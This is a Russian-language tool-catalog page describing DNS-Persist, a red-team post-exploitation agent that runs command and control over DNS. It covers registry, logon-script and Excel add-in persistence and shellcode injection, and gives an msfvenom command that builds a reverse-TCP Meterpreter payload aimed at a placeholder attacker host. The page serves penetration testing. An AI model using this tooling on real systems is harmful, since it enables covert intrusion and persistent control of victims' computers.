Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DNS-Persist — DNS-Persist — это постэксплуатационный агент, использующий DNS для управления и контроля. | Kitploit
Инструменты/GitHubGitHub/0x09al/dns-persist
Генерация полезной нагрузкиМеханизмы персистентностиШелл-кодПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingАнализ DNS
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist — это постэксплуатационный агент, использующий DNS для управления и контроля.

Репозиторий
207638 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

DNS-Persist

DNS-Persist — это пост-эксплуатационный агент, который использует DNS для управления и контроля (C2). Серверная часть написана на Python, а агент — на C++. Это первая версия, в будущем будет добавлено больше функций и улучшений.

Начало работы

Автор

0x09AL - https://twitter.com/0x09al

Отказ от ответственности

НЕ ИСПОЛЬЗУЙТЕ ЭТО ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ В НЕЗАКОННЫХ ЦЕЛЯХ.

АВТОР НЕ НЕСЁТ НИКАКОЙ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВИЛЬНОЕ ИСПОЛЬЗОВАНИЕ КОДА, ПРЕДОСТАВЛЕННОГО ЗДЕСЬ.

Изобрёл ли я велосипед?

Существует много отличных работ по DNS C2, но я создал это программное обеспечение, чтобы сделать больший акцент на персистентности. Я не эксперт в C++, и это моя первая «настоящая программа» на C++ (так что ожидайте немного такого кода, от которого становится неловко).

Предложения по функциям и улучшениям открыты.

Архитектура

Есть две основные части:

  1. DNS-сервер
  2. Агент

alt text

Возможности

Механизмы персистентности

В этой версии только 3 механизма персистентности. Позже будет добавлено больше.

  1. Персистентность через LogonScript.
  2. Персистентность через RunKey.
  3. Персистентность через надстройку Excel.

«Интерактивная» командная оболочка

Эта версия поддерживает псевдоинтерактивную командную оболочку, которую вы можете использовать для выполнения системных команд.

Внедрение шеллкода

Эта версия поддерживает внедрение 32-битного шеллкода. Шеллкод выполняется в новом потоке в том же процессе, поэтому падающий или недействительный шеллкод также приведёт к падению агента. Избегайте NULL-байтов в шеллкоде.

Пример генерации шеллкода

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

Список TODO

  1. Добавить шифрование. В этой версии нет никакого шифрования, так что пользуйтесь ею на свой страх и риск.
  2. Добавить больше механизмов персистентности.
  3. Агент на разных языках программирования.

Установка и использование

Серверная часть

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

По умолчанию будет запущен DNS-сервер на порту 53. Вы можете изменить это в файле server.py.

Агент

Я использовал Visual Studio 2010 для написания агента, так что импортировать и компилировать его должно быть довольно просто.

Имейте в виду, что нужно изменить переменную DOMAIN_NAME в Declarations.h, чтобы она соответствовала вашему доменному имени.

Серверы имён домена должны указывать на IP-адрес DNS-Persist.

root@kitploit:~
#define DOMAIN_NAME "example.com"

Скриншоты

  1. Picture-1

alt text

  1. Picture-2

alt text

  1. Picture-3

alt text

  1. Picture-4

alt text

Скачать инструмент